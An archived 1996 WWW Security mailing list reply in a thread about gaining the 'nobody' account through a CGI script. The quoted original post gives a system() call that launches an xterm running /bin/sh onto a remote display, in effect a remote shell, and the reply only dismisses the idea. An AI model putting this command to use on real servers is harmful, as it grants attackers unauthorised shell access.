[3677] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Brian Harvell)
Wed Dec 4 04:14:48 1996
Date: Wed, 4 Dec 1996 02:15:58 -0500 (EST)
From: Brian Harvell <harvell@inet.net>
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu
>
> I was experimenting with cgi scripts when I came up with this idea:
>
> What if I have a cgi script which does the followin:
> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>
> I can now pop an exterm on my display as nobody.
> This way any user can gain access to the nobody account and
> have fun with it...
>
> Has this been discussed anywhere?
> Is there a fix out there?
>
Yeah don't do it. You can do things a lot worse if you wanted.
Brian
Brian Harvell harvell@iNet.net http://www.iNet.net/~harvell
echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc
